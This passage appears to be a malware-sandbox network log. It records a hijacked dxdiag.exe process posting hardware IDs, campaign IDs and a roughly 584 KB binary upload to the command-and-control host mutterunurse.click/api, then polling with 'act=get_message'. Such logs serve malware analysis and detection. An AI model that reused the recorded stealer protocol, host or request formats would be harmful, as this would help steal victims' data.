                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20547
                                                                                        Host: mutterunurse.click
                                                                                        2025-01-13 07:34:30 UTC15331OUTData Raw: 2d 2d 39 58 48 52 44 5a 42 51 48 36 4e 57 39 30 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 32 35 46 45 31 38 44 31 37 41 36 38 41 33 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 39 58 48 52 44 5a 42 51 48 36 4e 57 39 30 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 58 48 52 44 5a 42 51 48 36 4e 57 39 30 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 4d 6e 4c 71 37 2d 2d 52 4c 43 0d 0a 2d 2d 39 58 48 52 44 5a 42
                                                                                        Data Ascii: --9XHRDZBQH6NW90GContent-Disposition: form-data; name="hwid"AD25FE18D17A68A323D904AF30EFEBBC--9XHRDZBQH6NW90GContent-Disposition: form-data; name="pid"3--9XHRDZBQH6NW90GContent-Disposition: form-data; name="lid"xMnLq7--RLC--9XHRDZB
                                                                                        2025-01-13 07:34:30 UTC5216OUTData Raw: 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: h'F3Wun 4F([:7s~X`nO`i
                                                                                        2025-01-13 07:34:31 UTC1133INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 07:34:31 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=6ugj5qco8nhrgaqpl9v3d445bg; expires=Fri, 09 May 2025 01:21:10 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IUvF%2FFLGEYyAsqoaYBfSmD5s6MMHgmGv9brqahFSSOn9Ngm0td8jV3XLJCdrOwwwRsaFYfpxrX5%2F0qqaC2tjT6vPoMM5i12O1B0ohrY1T2B%2BSl3dZU9xjipiORHgii%2BY0ynS76Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9013b449cd444379-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1773&rtt_var=686&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21508&delivery_rate=1646926&cwnd=210&unsent_bytes=0&cid=fd58f16d8ccea6c1&ts=636&x=0"
                                                                                        2025-01-13 07:34:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2025-01-13 07:34:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.549742104.21.90.184435392C:\Windows\SysWOW64\dxdiag.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 07:34:32 UTC278OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=5NB1T9VDRO9LG
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1231
                                                                                        Host: mutterunurse.click
                                                                                        2025-01-13 07:34:32 UTC1231OUTData Raw: 2d 2d 35 4e 42 31 54 39 56 44 52 4f 39 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 32 35 46 45 31 38 44 31 37 41 36 38 41 33 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 35 4e 42 31 54 39 56 44 52 4f 39 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4e 42 31 54 39 56 44 52 4f 39 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 4d 6e 4c 71 37 2d 2d 52 4c 43 0d 0a 2d 2d 35 4e 42 31 54 39 56 44 52 4f 39 4c 47
                                                                                        Data Ascii: --5NB1T9VDRO9LGContent-Disposition: form-data; name="hwid"AD25FE18D17A68A323D904AF30EFEBBC--5NB1T9VDRO9LGContent-Disposition: form-data; name="pid"1--5NB1T9VDRO9LGContent-Disposition: form-data; name="lid"xMnLq7--RLC--5NB1T9VDRO9LG
                                                                                        2025-01-13 07:34:32 UTC1130INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 07:34:32 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=4dvlk8kg5g3c59788vg9mqelfd; expires=Fri, 09 May 2025 01:21:11 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jzecRIUaaSGt70lP1A6uJEk%2Fidq6YYpyiUy5ki0Q9twbpDmn5BQcoLiQSlzt02JaP6lL%2F%2BEm5peDrxwLM6TNGD0jtjCxlJhOMXYgiytOiYI3yv80dcO9KN0AZKR55xNq%2F9U8i5w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9013b452d9f041cf-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1634&rtt_var=638&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2145&delivery_rate=1682997&cwnd=169&unsent_bytes=0&cid=300c54d7130e1d3b&ts=495&x=0"
                                                                                        2025-01-13 07:34:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2025-01-13 07:34:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.549753104.21.90.184435392C:\Windows\SysWOW64\dxdiag.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 07:34:33 UTC284OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=J9WN8UYPFXGQ22X3T
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 584195
                                                                                        Host: mutterunurse.click
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: 2d 2d 4a 39 57 4e 38 55 59 50 46 58 47 51 32 32 58 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 32 35 46 45 31 38 44 31 37 41 36 38 41 33 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4a 39 57 4e 38 55 59 50 46 58 47 51 32 32 58 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 39 57 4e 38 55 59 50 46 58 47 51 32 32 58 33 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 78 4d 6e 4c 71 37 2d 2d 52 4c 43 0d 0a 2d 2d 4a
                                                                                        Data Ascii: --J9WN8UYPFXGQ22X3TContent-Disposition: form-data; name="hwid"AD25FE18D17A68A323D904AF30EFEBBC--J9WN8UYPFXGQ22X3TContent-Disposition: form-data; name="pid"1--J9WN8UYPFXGQ22X3TContent-Disposition: form-data; name="lid"xMnLq7--RLC--J
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: 4f 2d 4e e9 b8 20 ae ae c3 a2 36 3d a2 76 c5 61 19 cd ce 1a 27 16 24 b2 6e d6 dd 38 e5 c3 34 9b 6a da d6 b1 78 ff 3b 88 8e 0a 7e 06 99 e3 49 b2 11 51 f0 0c ea c4 dd e6 80 5d 5b 0c 4c 83 26 96 77 4b aa c9 0c 83 f8 9d 5b 62 a4 cb 10 69 fd 74 df b5 73 c4 de 43 d1 b0 af c8 0c 2f 83 89 6a 9d 58 13 ec 29 1c 8a 64 f2 93 54 74 26 0d 00 c6 e6 78 19 fe 14 85 96 76 fa 71 ea 71 63 15 c2 39 f3 1c 41 ea ec 86 22 a3 de 93 12 76 07 1b ca 8d 92 86 28 48 da 6f 9c e2 52 44 cb fd f4 88 26 f0 6d 4a 65 bd 43 25 27 58 85 19 f7 29 54 b3 bc c5 8f 61 d0 a6 f0 e1 9c 93 1e 58 92 ec cb 4a 8f 73 f9 db fb 71 85 40 12 bf 5a c2 0d 43 ac af 4e 6f 8a 9a 33 69 12 75 98 d5 e9 51 ce 2d 28 7f 56 ab 5c 9b 9e bc 58 b7 c3 34 12 c9 4e 43 51 fc 30 97 74 9a 03 c3 0a fb 61 6e 81 e9 6f e3 e7 c6 6b ec
                                                                                        Data Ascii: O-N 6=va'$n84jx;~IQ][L&wK[bitsC/jX)dTt&xvqqc9A"v(HoRD&mJeC%'X)TaXJsq@ZCNo3iuQ-(V\X4NCQ0tanok
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: bb 8c d0 9f 31 69 04 a7 9f 99 5d 9a f2 a2 7e ab 31 de 4b 61 8a 05 31 29 1e c2 49 8f 7c 0f 56 bb e5 57 24 57 7c b4 4e 77 8a a4 7b b4 71 9f 63 0e b8 55 89 9f bb bd f8 9f 80 dd 5f b7 3e e1 4f fe 24 2d 0e 8f f5 8a 2e 62 e2 75 c1 54 8d 18 f6 d9 e7 2b de 7c 78 19 e5 4e 1b 34 cc 3d 7d 07 8d eb 81 18 d6 8e 72 ea 1b eb 63 df b1 9b bd 0f 9e ed 9a 0e 4a b5 05 86 1f ff b6 c7 60 bc fb 56 ea c7 92 25 c3 fc 4c 5c d4 f9 5b 6d 6f cf f1 61 8f 29 bb c7 da 45 8a e2 2e 69 96 f7 f2 92 f8 c5 89 18 30 77 62 9e 51 77 90 72 0c 2e 10 a5 ea a4 d8 22 59 fa ef 67 1f f1 a2 b4 7a 9f d8 bf 13 8b b0 7c 98 65 48 35 78 93 53 9d 95 fe a5 9b de ea 13 3d 7b f5 fd e2 1b 99 cd d3 c3 4f 46 78 ee 51 aa 6e 53 a8 15 8c 7c ee d2 03 33 eb 1e 87 79 50 db d2 94 3a da 6e c1 81 4b 56 87 40 c8 fb cc 2d 81
                                                                                        Data Ascii: 1i]~1Ka1)I|VW$W|Nw{qcU_>O$-.buT+|xN4=}rcJ`V%L\[moa)E.i0wbQwr."Ygz|eH5xS={OFxQnS|3yP:nKV@-
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: d3 c5 b8 51 d2 7c ed 59 5c ae 7a 90 e0 a8 a7 02 9b 3b 39 3d 36 ac 9c 08 70 c3 d2 df ae 8c 6f e0 c2 a3 85 6e 4c 1f 2e dc 9a 73 e3 1b 31 d2 df 8a ba e8 a3 4f ef 2b 78 14 7a 6f d6 33 66 65 7f df a6 c0 7e ba 10 b6 f8 09 fb 46 72 75 27 9f ab 9e d0 de c8 9d db b3 fb 2d f9 d1 69 1c 92 eb 96 2b f5 30 14 69 12 8c 38 77 3f 9c e9 2b e4 f5 14 b4 aa 86 db 9b c8 2f 3a e1 6d 54 70 43 9b 8e b0 27 69 ed d2 81 c1 be ef 7c f8 b2 e1 74 3b 0e 8d 63 a3 b5 30 aa b5 55 f8 9a 96 7a 74 8f 02 b9 b0 d6 98 f5 d1 6f cb 58 3d 28 6c 6b e5 db 55 cb 44 2b 21 d2 a9 41 24 d5 1c 06 8b 97 07 17 b1 7a 72 30 a2 a1 26 69 df 5d d3 4b 67 18 67 13 8f 80 5e 11 f4 29 6b 32 d9 16 d8 9a 12 73 af a8 44 ee 7d 27 20 77 08 cc 1a 8e 6c de be ce 07 ca 34 63 4f 24 45 96 ef 0e 82 83 fd 42 40 00 d6 23 09 64 62
                                                                                        Data Ascii: Q|Y\z;9=6ponL.s1O+xzo3fe~Fru'-i+0i8w?+/:mTpC'i|t;c0UztoX=(lkUD+!A$zr0&i]Kgg^)k2sD}' wl4cO$EB@#db
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: fc 93 3e 84 c8 04 78 47 45 84 59 ba fe 43 e2 2e 30 02 ea b6 0a 40 77 58 f6 4a 5f 54 05 5d 52 8c e7 70 d1 3a 82 05 25 2c 59 4b 9c 69 f2 b4 55 c6 e8 e0 c1 b8 10 b9 a5 1d d0 37 86 5e 81 68 15 de 76 ec 4b 39 ac 22 78 d9 c0 1e 6e a6 8b 8b ca d4 d9 80 77 c4 e1 b2 2c c8 ef 4e a6 0c d7 3a 02 42 86 78 b3 56 e1 f6 46 a7 f7 03 3d cd 9d 9f de f8 88 6b 8e d5 1e 07 29 74 1b 26 f7 ef 36 39 7c f9 e6 45 e8 17 ea 32 c7 77 58 23 a3 fa c5 4e bd a9 4e ce 4e 86 8f e7 2b 7e fc f9 8f 53 b4 24 fc fa b3 a2 b8 28 10 26 b5 f8 e6 a4 ad 27 6f ea e2 d5 d7 c4 e9 de 4e 0b 37 b8 f1 b1 88 a0 f2 ac 68 e3 c2 a9 30 a8 ec 11 75 9f 8a 87 1b eb c1 98 8c df 53 46 f8 68 e3 b8 08 bf 09 37 c1 4d 07 a4 19 33 eb de 1e 0f 3f e5 cc 64 61 e9 a8 0e d9 bc 57 ca 81 00 ce 19 11 c4 26 04 35 44 f7 71 9f 1d e5
                                                                                        Data Ascii: >xGEYC.0@wXJ_T]Rp:%,YKiU7^hvK9"xnw,N:BxVF=k)t&69|E2wX#NNN+~S$(&'oN7h0uSFh7M3?daW&5Dq
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: 8f f5 b4 71 48 1b 77 35 56 e9 86 1e 1b a5 06 3c bc 0c 76 f6 6c 1b 8e ee 31 b1 d6 63 5d 98 c4 8b 27 52 5c 44 13 c3 1a f5 27 25 50 d7 85 5d 73 97 55 c7 64 4a 52 52 7c 35 0f 4c 24 17 dd d5 46 a9 c8 af 97 6e 57 96 42 ad 7d a4 36 c8 4e d2 b3 9a 38 a3 26 f2 f0 c0 1d fa 29 55 08 ec 5b 12 a1 d6 6c e0 f0 21 9e 10 dd a8 16 f8 ce bc 67 af dd 57 bb 31 51 30 39 90 34 f1 12 10 f6 31 2e 48 31 e6 1b f7 fa 11 da 3e c3 27 f8 46 00 e3 22 02 a1 9e e0 e0 3b 50 ab 04 28 47 fc 20 00 fa 3d 18 ae 1e f3 48 39 12 fc e1 b2 4d 49 18 2b c3 d3 3e 7f 63 5d e4 20 a9 9c 1b 7f 97 7c 8e c6 2c 70 6a ae 5a eb fb a1 1c fe 97 a7 98 6b ba 9e 59 a0 90 b8 de 8c 26 4b 0a 98 3d 9c 5d d9 ae 32 ba 67 50 c4 6b b5 c6 53 fd 8c fb d7 6a 76 7a d5 62 e6 c4 20 7b 41 8f 4b 4d 96 6a e0 7d 72 2a da f3 83 93 ae
                                                                                        Data Ascii: qHw5V<vl1c]'R\D'%P]sUdJRR|5L$FnWB}6N8&)U[l!gW1Q0941.H1>'F";P(G =H9MI+>c] |,pjZkY&K=]2gPkSjvzb {AKMj}r*
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: cc bb 29 36 e7 a8 e5 5b 1b 04 77 2d 17 6b 83 73 5f 71 df 6c 7f f6 44 85 c4 ef f9 31 87 05 0a 13 f3 a2 0c 51 cc f5 e6 5a d3 be 5e 2f c5 30 15 87 5c 58 b3 75 2e e7 90 8a c0 ce c5 75 3f 3e ca ab 55 69 46 b2 3f f4 4e 99 c4 c2 00 d1 f5 ed 20 b6 cc 78 e9 ca 72 cd ed f9 3b dc 39 8f 47 17 30 20 91 5a b3 b1 da 4a 35 fd 0d 98 68 65 ae f3 a9 4f 5b b9 ca 0b 6f 35 45 3a 87 bb 34 11 ad 57 3c 4f 93 a6 12 66 d6 17 37 92 71 e3 20 7c 66 6a c1 b2 b4 cf a5 99 4e 9b e2 03 54 f6 73 1f 40 41 6d ac 41 54 01 40 3b 0d d1 45 83 c1 7c 8b 1f 38 2e 02 1c 68 1a dc a1 ad ce a1 4b 41 39 f3 34 93 9b 68 e6 ca c0 3f 01 d2 f6 13 a8 3b bc a1 17 71 9f 9c 80 ad 59 16 bd c6 90 42 51 8f 36 23 23 f4 e0 e6 c5 7b 93 94 03 d5 21 36 07 de 79 da f7 ee ad 6c 87 6a 2c 85 d0 33 4b 23 a4 be be b2 52 c7 78
                                                                                        Data Ascii: )6[w-ks_qlD1QZ^/0\Xu.u?>UiF?N xr;9G0 ZJ5heO[o5E:4W<Of7q |fjNTs@AmAT@;E|8.hKA94h?;qYBQ6##{!6ylj,3K#Rx
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: e1 5a 7b 6d 1d a6 da d4 57 c8 8b cb aa ee 93 df 16 50 58 49 db 90 1f 2a 06 85 cb 73 78 b1 dc 83 a2 b6 4d 57 46 02 eb 12 05 ab 97 50 70 94 ac d9 36 82 f6 83 bf fa 10 a2 e1 13 02 68 e2 29 47 56 90 59 4a e0 f4 4b 32 c8 86 d5 31 9c 4d 08 4e 25 92 05 37 cf ec 03 bd 3a 63 bf 5e 3d 0b 83 6d a4 c1 85 18 c8 06 af f3 02 e4 2b e3 06 fe d2 cd d6 96 02 4d 92 14 31 30 2b 0a b5 42 a4 08 aa d9 0f e1 9c 0b 44 6b 31 ce e5 c8 34 9f 0d 9f 0b dc 44 66 c9 e1 f1 e2 bd 86 43 42 98 03 d8 e6 e3 61 aa a8 d3 9a 90 00 b3 a0 9e 18 03 da 36 07 6a 47 52 ce 92 10 e5 97 c4 85 21 22 3c 80 1d 87 7e bc 6f 54 4c c0 02 5e 48 4c f1 e1 55 f8 33 40 11 f3 ef 37 7d 40 41 ef 15 42 a2 51 f0 34 b8 04 b2 0b 38 58 e6 7f 26 bb a3 23 14 4a 15 09 7a e8 9f 73 59 40 03 18 94 e6 c5 99 c4 a2 ad 5a 84 ea 56 62
                                                                                        Data Ascii: Z{mWPXI*sxMWFPp6h)GVYJK21MN%7:c^=m+M10+BDk14DfCBa6jGR!"<~oTL^HLU3@7}@ABQ48X&#JzsY@ZVb
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: 6f a5 9e d5 e4 83 d0 6d 19 ff 7b 7c 92 ad 41 44 1b d4 eb 02 0e 7e 0b dd 9b fc a7 2a b8 2e c4 47 30 bd 81 ca 8b fb fc 6e ae 4a b4 5a fe 4d 0f 0e c1 0b 7d 5a 11 6a bc 6a 3e 20 1f 27 c5 39 7e 24 49 11 85 da df 95 ad 6e 17 84 43 b9 a6 95 a9 1e 41 21 d7 33 c4 24 67 74 f6 f1 f3 bb 57 60 b7 bd 5b e5 7b f0 13 6f b7 f2 d6 0f 70 18 9b 41 ee 42 0c 1d 6d 4b bb 90 70 6a 2f f7 af 3d 8c 47 90 44 43 ba d6 d5 64 82 a4 b6 f7 b0 92 7d e8 41 ee e3 10 83 87 89 61 c8 77 53 e4 af ab 24 cd 1b cf be f0 a7 4f ff f7 da 53 36 12 cf 45 44 ad c8 4b 92 d8 fc c6 ec 3c f1 e0 fd a2 28 80 9a cd bc a8 d1 cc 8e 66 98 3e 89 d4 db 7c 5d ab 6e c5 5f e3 d5 8a 7c a3 94 c0 58 35 f4 26 08 ef 9f 0e 34 69 95 94 f9 f7 18 fc a9 3f 9e 92 f0 89 a6 82 7d ef ef b7 2e bf 6e 27 4b 93 23 ca 0f 06 c7 ac 7f d9
                                                                                        Data Ascii: om{|AD~*.G0nJZM}Zjj> '9~$InCA!3$gtW`[{opABmKpj/=GDCd}AawS$OS6EDK<(f>|]n_|X5&4i?}.n'K#
                                                                                        2025-01-13 07:34:33 UTC15331OUTData Raw: e9 4c ec 3f bd 92 2c 2b 76 a8 6e d7 a1 9b 3b d2 70 29 77 44 4e 4f 6a 14 89 ce ed 7e 57 e3 b7 7e bd 2f 29 ec d2 6b 4c 6f 94 ac 3c c4 ab 78 eb ed 17 c3 4b a0 6e fa 51 a8 39 67 f0 a3 2c 87 d7 5f 36 b0 1e e1 db 76 13 bb f2 bd 41 74 9c bd 73 70 a0 41 cc 03 af 14 de 46 ed 52 a6 fe 38 fb 63 13 e0 0d 7e da 30 2b a5 1b 3a f0 2e 94 1b 3c 9b 8d 96 2f ed 3c a7 3c e7 7c 73 78 27 7b f2 74 67 45 32 6e 75 1b 7b cd 62 a1 af 1c 5d 33 e3 5c c3 d6 28 99 a8 95 ed 1d 8d b1 11 07 ac 77 96 d5 7f 06 07 0e 0b 81 90 e9 9f 00 0c 04 fd f1 9c 65 1f 0f 13 d0 25 3d 13 60 dc 8c 64 0c 08 42 c4 84 13 9e 45 ff 68 28 99 cd f6 36 01 06 1b ff 05 8f 25 d7 31 ff 6f b9 83 36 44 de 88 ba f1 f3 e0 53 d1 8d 58 c5 de f0 94 2d 06 38 3d 94 89 b8 23 cb e6 aa 42 58 83 84 76 34 12 3b 4b 52 38 5b 8a 9a 10
                                                                                        Data Ascii: L?,+vn;p)wDNOj~W~/)kLo<xKnQ9g,_6vAtspAFR8c~0+:.</<<|sx'{tgE2nu{b]3\(we%=`dBEh(6%1o6DSX-8=#BXv4;KR8[
                                                                                        2025-01-13 07:34:35 UTC1143INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 07:34:35 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=u6md5aeil0997ujdolnsojvv6n; expires=Fri, 09 May 2025 01:21:14 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYsM2UKTH2n2obqv74eZnG6cCZZJSmuGntXx0GgxfgoPpceAipXrk%2FV0h3uRo9m%2Fjd89Ds6OQmFOt%2Fq8K6gwu3ULFTLv6gaUNR1pI75V3pS%2F9Pgg9sweo9Oj3aOLJH3C%2B%2FDG%2B80%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9013b45cfc16c34b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1462&rtt_var=565&sent=357&recv=599&lost=0&retrans=0&sent_bytes=2847&recv_bytes=586787&delivery_rate=1907250&cwnd=172&unsent_bytes=0&cid=0dd5aafaeacc1225&ts=1655&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.549770104.21.90.184435392C:\Windows\SysWOW64\dxdiag.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-01-13 07:34:35 UTC266OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 80
                                                                                        Host: mutterunurse.click
                                                                                        2025-01-13 07:34:35 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 78 4d 6e 4c 71 37 2d 2d 52 4c 43 26 6a 3d 26 68 77 69 64 3d 41 44 32 35 46 45 31 38 44 31 37 41 36 38 41 33 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                                        Data Ascii: act=get_message&ver=4.0&lid=xMnLq7--RLC&j=&hwid=AD25FE18D17A68A323D904AF30EFEBBC
                                                                                        2025-01-13 07:34:36 UTC1125INHTTP/1.1 200 OK
                                                                                        Date: Mon, 13 Jan 2025 07:34:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=v269mps88j3lrfbndr1gtp5mgu; expires=Fri, 09 May 2025 01:21:15 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4B3HoOvgy4k60JhpFUFFMN3BT3ppJY2saLM84gomaI7lawH7L5GjpOECC1mKJEtYzdAZw0crpYz323OND%2B1yLpPfNCj4KVoUVcEmnXWA1slFiKs84C5cGRyKhh%2FazMD5i5eZhw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9013b46a7d476a5b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1702&rtt_var=644&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=982&delivery_rate=1692753&cwnd=209&unsent_bytes=0&cid=63b91b715df5d07f&ts=471&x=0"
